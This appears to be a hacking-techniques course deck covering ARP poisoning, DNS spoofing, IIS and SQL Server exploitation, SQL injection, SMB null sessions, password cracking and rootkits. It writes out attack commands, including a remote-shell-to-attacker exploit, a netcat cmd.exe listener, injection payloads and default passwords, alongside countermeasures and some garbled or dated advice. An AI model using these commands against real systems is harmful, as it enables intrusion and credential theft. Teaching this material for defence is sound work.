Day3 Backup

Network Security

and
Hacking Techniques
Day-3

Typical Network- Hacking Techniques
“The Linux Based PC Servers
Services that
Mean Business Visible
Securing Internet” IP
Address

I Want
these
systems
Internal
Network Linux and
windows
Host
Application Servers
Like IDS,Sniffers

Network Security and Hacking Techniques – DAY-3

Network-Level Attacks
 ARP Refresher
 Sniffing Attacks
 Sniffing Detection
 Ettercap Example
 DNS Cache Poisoning
 Denial of Service Attacks


ARP Refresher
 ARP Message Formats
 ARP packets provide mapping between hardware layer and
protocol layer addresses
 28 byte header for IPv4 ethernet network
 8 bytes of ARP data
 20 bytes of ethernet/IP address data
 6 ARP messages
 ARP request and reply
 ARP reverse request and reply
 ARP inverse request and reply


Gathering and Parsing Packets (Cont..)
 IP Address Spoofing Variations


ARP Request Message

 Source contains initiating system’s MAC address and IP
address

 Destination contains broadcast MAC address ff.ff.ff.ff.ff.ff


ARP Reply Message

 Source contains replying system’s MAC address and IP
address

 Destination contains requestor’s MAC address and IP
address


Unsolicited ARP Reply

 Any system can spoof a reply to an ARP request

 Receiving system will cache the reply
 Overwrites existing entry
 Adds entry if one does not exist

 Usually called ARP poisoning


Types of Attack
 Sniffing Attacks

 Session Hijacking/MiM


Sniffing on a Hub

Sniffer Source Destination

CIS COS YS TEMS

Hub

Host to Host Exploit

Client (C) Server (S) Hostile

Real ARP Reply Spoofed ARP Reply
C

Spoofed ARP Reply
S
Broadcast ARP Request


Host to Router Exploit

Client (C) Gateway Router (R) Hostile

S
CT
SM
CS
IY
OS
E

Real ARP Reply Spoofed ARP Reply
C

Spoofed ARP Reply
R
Broadcast ARP Request


Relay Configuration
Attacker
0:c:3b:1a:7c:ef- 10.1.1.10

M-1 M-3
0:c:3b:1c:2f:1b- 10.1.1.2 0:c:3b:9:4d:8- 10.1.1.7

0:c:3b:1a:7c:ef- 10.1.1.7 0:c:3b:1a:7c:ef- 10.1.1.2


Relay Configuration (cont.)

Sniffer Source Destination

CI COSYST
S EMS

Switch

Detection
 OS Level Detection

Operating OS Level Detection
System Detection

Windows 95 NO
Windows 98 NO
Windows NT NO
Windows 2000 NO
Linux RedHat 7.0 NO
FreeBSD 4.2 YES


Hypothetical Detection Application
 Purpose
 Track and maintain ARP/IP pairings
 Identify non-standard ARP-replies versus
acceptable ones
• Timeout issues
 OS must withstand corruption itself
 Fix broken ARP entries of systems
• Transmission of correct ARP replies


Tools and Utilities
 Manipulation
 Dsniff 2.3
 Hunt 1.5
 Growing number of others
 Local monitoring
 Arpwatch 1.11


Tools - ARP Spoofing
 Windows
 Ettercap
 Unix
 Dsniff
 Hunt


Ettercap
 To start
 C:ettercap –i dev1
• Try dev0, dev1, dev2, etc., until it finds your Ethernet adapter
• It takes a long time to scan the network


Ettercap Sniffing Options
Usage: ettercap [OPTION] [HOST:PORT] [HOST:PORT] [MAC] [MAC]
Sniffing method:
-a, --arpsniff ARPBASED sniffing (specifying two hosts)
SMARTARP (specifying one host but with the list
PUBLICARP (specifying only one host silently)
in silent mode : must specify both IP and MAC
i.e.: ettercap -Nza IP IP MAC MAC (ARPBASE
ettercap -Na IP MAC (SMARTARP
ettercap -Nza IP MAC (PUBLICAR

-s, --sniff IPBASED sniffing
you can specify the ANY ip that means ALL hosts
e.g.: ettercap -Nzs ANY:80 (sniff only http)
-m, --macsniff MACBASED sniffing
e.g.: ettercap -zm MAC1 MAC2
ettercap -Nm MAC
Off Line Sniffing:
-T, --readpcapfile OFFLINE sniffing (read packets from a file)
e.g.: ettercap -T file_dumped_from_tcpdump
-Y, --writepcapfile DUMP packets to a pcap compatible file format
e.g.: ettercap -NzsY file_to_be_dumped


Spoofing example with Ettercap
 HOST 1 telling that 10.1.1.7 is on 0:c:3b:1a:7c:ef
 HOST 2 telling that 10.1.1.2 is on 0:c:3b:1a:7c:ef
(C:ettercap –a 10.1.1.2 10.1.1.7 0:c:3b:1c:2f:1b 0:c:3b:9:4d:8)
now they are poisoned !! they will send their packets to us ! Then if we receive
packets from:
 HOST 1 we will forward to 0:c:3b:9:4d:8
 HOST 2 we will forward to 0:c:3b:1c:2f:1b

Attacker
0:c:3b:1a:7c:ef- 10.1.1.10

M-1 M-3
0:c:3b:1c:2f:1b- 10.1.1.2 0:c:3b:9:4d:8- 10.1.1.7
0:c:3b:1a:7c:ef - 10.1.1.7 0:c:3b:1a:7c:ef - 10.1.1.2


Bibliography
 Finlayson, Mann, Mogul, Theimer, RFC 903 “A
Reverse Address Resolution Protocol,” June 1984
 Kra, Hunt 1.5, http://www.gncz.cz/kra/index.html,
Copyright 2000
 Lawrence Berkeley National Laboratory, Network
Research Group, Arpwatch 1.11, ftp://ftp.ee.lbl.gov/
arpwatch.tar.Z, Copyright 1996
 Plummer, David C., RFC 826 “An Ethernet Address
Resolution Protocol,” November 1982
 Russel, Ryan and Cunningham, Stace, “Hack
Proofing Your Network,”, Syngress Publishing Inc,
Copyright 2000
 Song, Dug, Dsniff 2.3, http://www.monkey.org/~
dugsong/, Copyright 2000


Network-Level Attacks(Cont…)
 Packet Sniffing:
Packet sniffer is a piece of software that grabs all of the
traffic flowing
 Dsniff –n –i 1


DNS Cache Poisoning
 DNS Cache Poisoning

 DNS ID Spoofing

 DNS Hides Poisoning


DNS Cache Poisoning - TOOL
 http://www.securiteinfo.com/download/wds.zip
 This tool is a simple DNS ID Spoofer for Windows 9x/2K
 the MAC address of the DNS server (or the default
gateway if the DNS server is in another network).

 Usage : wds -h

 Example : wds -n www.microsoft.com -i 216.239.39.101
-g 00-00-39-5c-45-3b


Gathering and Parsing Packets (Cont..)
 The ARP Cache poisoning:


Denial of Service Attacks


 DoS attacks are as old as the Internet itself
 Year 2000 when a complete new quality of DoS
attack started (DDoS).
 (DDoS) stroke a huge number of prominent web
sites including Yahoo, Ebay, Amazon and
Buy.com
 DDoS Concepts: Distributing the attack across
several hosts. Coordinating the attack among
many machines. Using the distribution system to
thwart all attempts of discovering the origin of
the attack.


 TCP Connections


Denial of Service Attacks (Cont…)

Abusing TCP: The Traditional SYN Flood


“Smurf”
IC M P e c h o ( s p o o f e d s o u r c e a d d r e s s o f v ic t im )
S e n t to IP b ro a d c a s t a d d re s s
I C M P e c h o r e p ly

In te rn e t

P e rp e tra to r V ic t im



The Development of Bandwidth Attacks



DOS



DDOS



Distributed Reflection DOS



Packet path diffusion



Diffusing the path


Prevention Techniques

 In g r e s s F ilt e r in g
Deployed by ISP's to drop packets with IP addresses
outside the range of a customer’s network, so that they
can prevent attackers from using forged source
addresses to launch a DoS attack.

 E g r e s s F ilt e r in g

Prevents one’s network from being the source of forged
communications used in DoS attacks.


Web Application Attacks

 Introduction

 Hacking Windows 2000: A Sample

 SQL Injection: Manipulating Back-end
Databases

 Cross-Site Scripting


The Hacking Exposed Philosophy

“The most important step
towards securing your network
Is trying to break into it.”


Background

 Most “script kiddies” will attack the OS
and web server service.
 They scan for web ports, search for
vulnerabilities, and then attack.
 The more sophisticated attacker will
attack the custom application running
on the web server.


Hacking Step 1: Scanning…

Step1: Using NMAP or Any port Scanner, he will find the
ports are opened on those network and what application
is running on those ports


Hacking Step 2: Vulnerability Scanning…
 Web vulnerability scanners check for known holes.
 Nikto is an Open Source (GPL) web server scanner which
performs comprehensive tests against web servers for multiple
items
#nikto.pl -h 206.135.57.178

-- nikto / v1.4.0 / rain forest puppy / www.wiretrip.net --
- Loaded script database of 1968 lines
=-=-=-=-=-=
= Host: 206.135.57.178
= Server: Apache/1.3.20 (Unix)
- www.apache.org
+ 404 Not Found: GET /cfdocs/
- Directory index: /scripts/
+ Found: GET /scripts/cfcache.map
+ 404 Not Found: GET /cfcache.map
+ 404 Not Found: GET /cfide/Administrator/startstop.html


Hacking Step 2: Vulnerability
Identification

Search Internet for current
vulnerabilities

 http://www.google.com
 http://www.securityfocus.com
 http://www.packetstormsecurity.com/


Vulnerability Identification

 www.SecurityFocus.com
 Vulnerabilities by vendor
 Vulnerabilities by BID
www.securityfocus.com/bid/<bid #>


Vulnerability Identification
 www.packetstormsecurity.com
 Useful directory of site
 http://packetstormsecurity.com/windows2000/


Hacking Windows 2000
 More recently, the most effective way to compromise a
Windows NT/2000 system is via Internet Information
Server (IIS)
 IIS is installed by default, listens on TCP 80; many don’t
realize it’s there (and vulnerable…)
 Those who run their Website on IIS can’t just block
access to it
 Windows 2000 ships with IIS version 5 (IIS5)
 Microsoft’s flagship Webserver has a long history of
security flaws
 It is debatable whether these flaws are more prevalent
in Microsoft code, or whether Microsoft’s code is simply
more prevalent
(Yes, we’ll talk about Gartner later…)


Top Five Windows 2000 IIS Threats
 Remote Command Execution Via Internet Printing
Service
 Microsoft IIS CGI Filename Decode Error Vulnerability
 Remote command execution via Buffer Overflow in
Indexing Service
 Unauthorised SMTP relaying
 Buffer Overflow i n FrontPage server extension


Remote Command Execution Via Internet Printing
Service

 Internet Printing is a new feature in Windows, introduced
with the release of Windows 2000 Server.
 It provides users with the ability to access a printer across
an Intranet or the Internet and submit a job directly to the
printer through the browser.
 This functionality is enabled by default
 The vulnerability exists in an unchecked buffer in the
msw3prt.dll, allowing an attacker to post a string of
approximately 420 characters that will cause the buffer to
overflow and commands to be overwritten with the newly
injected shell code.


IIS Buffer Overflows: IPP

Simple to exploit:

GET /null.printer HTTP/1.0
Host: [> 420 char. buffer]


 Published exploits:
jill-win32.exe by dark spyrit
Iis5hack.exe by hsj
 Remotely exploits buff. overflow, inserts shellcode
to “shell” back to a listener on attacker’s system
 Evil…


IPP Buffer Overflow DEMO

IPP Buffer Overflow DEMO

 Start netcat listener on attacker’s system
nc –vv –l –p 23
 Execute jill-win32:
jill-win32 victim 80 attacker 23
 Shell pops up on attacker’s machine, SYSTEM
context


Practicals

Try to compromise your server


SQL Scanning
 TCP port 1433
 SQL Server defaults to listen on these ports
since ip-sockets net-lib is installed by default
(along with named pipes)
 UDP port 1434
 Thanks to multiple instancing, having to know
the exact port is not needed to connect since
the net-libs will be more than happy to auto-
connect you to the instance


SQL Scanning (cont.)
Starting nmapNT V. 2.53 SP1 by ryan@eEye.com
eEye Digital Security ( http://www.eEye.com )
based on nmap by fyodor@insecure.org ( www.insecure.org/nmap/ )

Interesting ports on (10.6.6.205):
(The 1507 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
88/tcp open kerberos-sec
135/tcp open loc-srv
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1026/tcp open nterm
1080/tcp open socks
1433/tcp open ms-sql-s -------
3389/tcp open msrdp


SQL Server Discovery
 Multiple instancing capabilities of SQL Server
2000 make enumeration a functional requirement
 A specially formed UDP packet directed at port
1434 will cause the SQL 2K listener service to
divulge information about every instance of SQL
Server running on that machine
 Packet Information
• Instance names
• Net-libs supported
• TCP ports and pipe names
• Clustering support (juicy targets)


Broadcast Discovery
 Since the listener may exist on multiple
machines, it is possible to send a broadcast UDP
packet to port 1434 to discover all instances of
SQL Server 2000 on a subnet
 sql –L (will return a raw listing)
 Capture returned packets
 Analyze


SQL Server Discovery
The following is a sample response from a SQL Server to the UDP broadcast:
(Captured using Snort-1.6.3 – http://www.snort.org)

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=+=+=+=+=+=+
[**] SQL Server Reply [**]
12/22-14:18:22.320099 10.6.7.37:1434 -> 10.6.6.194:4412
UDP TTL:128 TOS:0x0 ID:15054
Len: 133
.z.ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;N
o;Version;8.00.194;tcp;1433;np;DEV-REPORT2pipesqlquery;;
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=+=+=+=+=+=+


SQLPing Utility

http://www.sqlsecurity.com/utils/sqlping.zip
 Directs a custom udp packet at a specific target or subnet and enumerates the server info across multiple instances

Listening....
ServerName:LANDROVER
InstanceName:SQL2K
IsClustered:No
Version:8.00.194
tcp:1241
np:LANDROVERpipeMSSQL$SQL2Ksqlquery
ServerName:LANDROVER
InstanceName:MSSQLServer
IsClustered:No
Version:7.00.623
np:LANDROVERpipesqlquery
tcp:1433
rpc:LANDROVER


SQL Code Injection

 Ability of an attacker to inject unintended
SQL statements into application
 Consequences
• Exposure of sensitive data
• SQL privilege escalation
• OS access
• COM+ access


Scope of SQL Injection
 SQL injection attacks rarely alerts IDS systems
especially over SSL
 Difficult to track down all the areas of
exploitation since the only real solution is manual
code review
 No amount OS security, firewalls, patch diligence
will stop SQL injection.
 The solution is good coding practices


SQL Injection Sample

 ASP Code
<%
Set Conn =
Server.CreateObject("ADODB.Connection")
Conn.open “dsn=myapp;uid=sa;pwd=45nf3k332fhj“

Set RS = Conn.Execute("SELECT * from users
where username=‘" & username & “’ AND
password=‘“ & password & "’" )

%>

SQL Injection Example 1
 Normal login

Login Page
UserName: bob
Password: b2oQeDr!

 SQL Server sees
• select * from users where username=‘bob’ and
password=‘b2oQeDr!’
• All is well (or so it seems)



 Malicious Login
Login Page
UserName: bob
Password: ‘ union select * from users where admin=1—

 SQL Server sees
• select * from users where username=‘bob’ and
password=‘’ union select * from users where admin=1
• In this case the user logs in as the site administrator


 Normal usage

User Search
Enter Last Name : andrews
Results:
Last First email
Andrews, chip chip@sqlsecurity.com

 Notice that on a search page we get immediate
feedback – good target for injection
 Also, since we see three columns we can assume
that’s all the SQL statement is selecting


 Malicious Usage

User Search
Enter Last Name : ‘ union select ’’,’’,@@version
Results:
Last First email
Microsoft SQL Server 2000
- 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c)
1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0
(Build 2195: Service Pack 1)


SQL Injection Samples
 Problems
 Poor input validation
 Secret in ASP code (source code disclosure)
 Poorly typed – SQL server and ASP not
checking data-types
 Security context too high for needed
functionality


Best Practices
 Use principle of least-privilege
 Assign MSSQLServer service non-administrator
user context
 Take the time to properly implement trusted
security (Integrated Mode)
 Don’t place passwords in script
 Assign complex ‘sa’ password even when using
Integrated security
 Consider dropping certain procedures in the
interest of security. They can always be added
later.


Operating System and Application-Level Attacks

 Password Cracking With L0phtCrack
 NetBios/SMB Hacking

 Buffer Overflows in Depth
 Examples of remote root exploit through
buffer overflow
 Root Kits


NetBios/SMB Hacking
 Introduction
 SMB/NetBios Explained and Exploited
 Win2k Architecture
 Network and Host Enumeration
 Penetration
 Pillaging Hosts
 Escalation
 Summary and Wrap-up


SMB/NetBios Explained and Exploited
 SMB is Server Message Blocks
 A protocol over NetBios or TCP
 Used for “net use” type communications
• UDP port 137 (name services)
• UDP port 138 (datagram services)
• TCP port 139 (session services)
 NT uses port 139
 Win2k uses ports 139 and/or 445


SMB/NetBios Explained and Exploited
 Mapping a drive syntax will prompt for password
 Null Session is no user with no password
 Access to TCP 139, 445, IPX, or NetBEUI
 Null session not meaningfully logged
 Normal part of other network operations
 Hackers can use to enumerate network

net use * targetshare */user:domainusername
net use targetshare “” /user:””


Host Enumeration
 Just to reiterate… We are connecting with a BLANK
username and a BLANK password
 This functionality is enabled by default on NT/2000 (port
445 also)
 This is one of the most debilitating vulnerabilities faced
by NT/2000 deployments of all sizes!!!!
 This connection is not logged in the Event Log, nor is it
recorded by a majority of the Host Based IDS products


Penetration
 The primary goal is to authenticate ourselves to
the remote host. We can do this by:
 Guessing username / password
combinations,
 Obtaining the user hashes, or
 Exploiting a vulnerable service


Password Guessing
 Guessing Username/Password combinations:
 Review results from DumpSec output
 Identify those that:
• haven’t changed their passwords
recently
• haven’t logged on recently
• are members of the admin group
• may be a shared group account
• are lab or test accounts
• have juicy info in the comment field


Guessing Passwords
 NT/2000 does not support logging on with
multiple credentials simultaneously, so:
 Log off as null session user:
 net use * /del
 Attempt to logon as target user:

net use targetipc$ * /user:targetusername


Password Guessing
 High Probability Combinations:
 administrator blank, password, administrator
 arcserve arcserve, backup
 test test, password
 lab lab, password
 username username,
company_name
 backup backup
 tivoli tivoli
 symbiator symbiator, as400
 backupexec backup


enum Brute Force Features
usage: enum [switches] [hostname|ip]
-U: get userlist
-M: get machine list
-N: get namelist dump (different from -U|-M)
-S: get sharelist
-P: get password policy information
-G: get group and member list
-L: get LSA policy information
-D: dictionary crack, needs -u and -f
-d: be detailed, applies to -U and -S
-c: don't cancel sessions
-u: specify username to use (default "")
-p: specify password to use (default "")
-f: specify dictfile to use (wants -D)


enum Brute Force Features


Password Guessing

Countermeasures
 Enable lockout for all accounts
 Use passprop to enable Admin lockout
(remote only, not TS)
 Enforce password policy (passfilt, KB
Q161990, W2K Account Policy)
 Audit logon/logoff failures
 Treat the Administrator and Domain Admins
accounts as holders of the keys to the kingdom –
they are!


Sniffing Password Data
 NT/2000 uses a challenge/response authentication
mechanism
 Neither passwords nor their hashes are sent across
the wire
 However, The L0pht discovered a way to extract
hashes from the logon exchange
 SMB Packet Capture
 L0pht Crack (2.52) works on an NT4 machine but
does not work on Win 2000
 Version 3 incorporates a new packet driver that
works?[not yet] on Win 2000
 ScoopLM from SecurityFriday does work on Win2k


Sniffing Passwords..L0pht


Sniffing Passwords..ScoopLM


Cracking Passwords
 Once you’ve obtained password hashes, there’s no good
reason not to start cracking them immediately
 Several tools have been written to optimize this process
The best are:
 L0phtcrack
 John the Ripper
 BeatLM for use with ScoopLM


Cracking Passwords

L0phtcrack


Cracking Passwords
John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer
Usage: john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE –stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3


Cracking Passwords

Countermeasure

 Enforce password length of exactly 7 characters

 All passwords should meet complexity minimums, such
as different case, numerals, and punctuation


Get Interactive Overview
 If we are truly to become the machine there are certain
things we must do
 Firstly, copy up our Admin Kit
 Second, is to gain an interactive shell
 Last is to prepare target machine in order to launch further
attacks


Get Interactive
Map to a drive on the target host and copy over the followin files:

 fscan
 Netcat
 Local
 Global
 Pwdump2,3
 Remote
 Lsadump2
 Cp
 DumpSec
 Getmac
 Netdom
 Nltest


Get Interactive : REMOTE.EXE
 Launch remote.exe on the target host
 Syntax:
 remote /s “cmd.exe” [secret]

 Connect to remote pipe
 Syntax
 remote /c hostname [secret]


Get Interactive : NC.EXE
 Netcat syntax on remote host:
 nc –l –d –p 2002 –e “cmd.exe”
 Netcat syntax to connect to listener
 nc –n –v target_ip 2002

This is the preferable method, but it only works
over IP. Great when 139 is blocked.



Buffer Overflows in Depth

Buffer Overflow Exploit
In general, buffer overflow attack involves the
following steps:
i. stuffing more data into a buffer than it can
handle
ii. overwrites the return address of a function
iii.switches the execution flow to the hacker
code



Process Memory Region


RootKit

Root Kits
 Rootkit name are combination from two words, root
and kit
 Collection of tools that enable attacker to keep the
root power

Type of Rootkit

 Application rootkit - established at the application
layer.
 Kernel rootkit - establish more deep into kernel
layer.


RootKit (Cont…)

Application Rootkit
 Programs replace to hide attacker presence.
Examples ls,ps,top,du,find,ifconfig,lsof
 Network Daemons with backdoor
 Sniffer Program

Kernel Rootkit
 Hiding processes.
 Hiding files
 Hiding the sniffer.
 Hiding the File System


NT Rootkit

Process hiding


NT Rootkit

File hiding


NT Rootkit
 Rootkit console with Keyboard sniffing


Detecting hidden processes

Two Software


Anonymity on the web
 Anonymity and the Internet
 Anonymizing proxy
 Case Studies – Anonymity WebSite
 Case Studies – Anonymity Softwares
 Questions


Anonymity and the Internet

Anonymity: the state of being unknown or
unfamiliar

Sometimes it is important for one’s identity to remain
anonymous

Why might individuals want their identity to
remain anonymous?

People generally do not like to be tracked without their
knowledge. The average web surfer and Internet
hacker wishes to remain anonymous.


Anonymity and the Internet

 There are many ways user information can be
discovered.

 An individual’s location or identity can be
determined using “cookies” and/or an IP address

 Cookie: a small piece of information that a
server stores on the user’s computer.
Example: a yellow pages site
 IP address: a series of four numbers which
uniquely identify your computer on the
Internet. Example: 129.186.1.201

 ISP’s keep track of the IP addresses their
customers use, and may also keep records of
names and pseudonyms

Anonymizing proxy
 Acts as a proxy for users
 Hides information from end servers

Request Request
End
Browser Proxy
Server
Reply Reply

 Sees all web traffic
 Free and subscription services available
 Some free services add advertisements to web pages


Case Studies – Anonymity WebSite

Anonymizer.com

Proxify.com


Case Studies – Anonymity Software

JAP

It is
integrated
with
Browser


Case Studies – Anonymity Software

Hopster
Bypass Firewall, Bypass Proxy


Anonymity on the web

Questions ??


Day3 Backup

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Destaque

Destaque (14)

Semelhante a Day3 Backup

Semelhante a Day3 Backup (20)

Último

Último (20)

Day3 Backup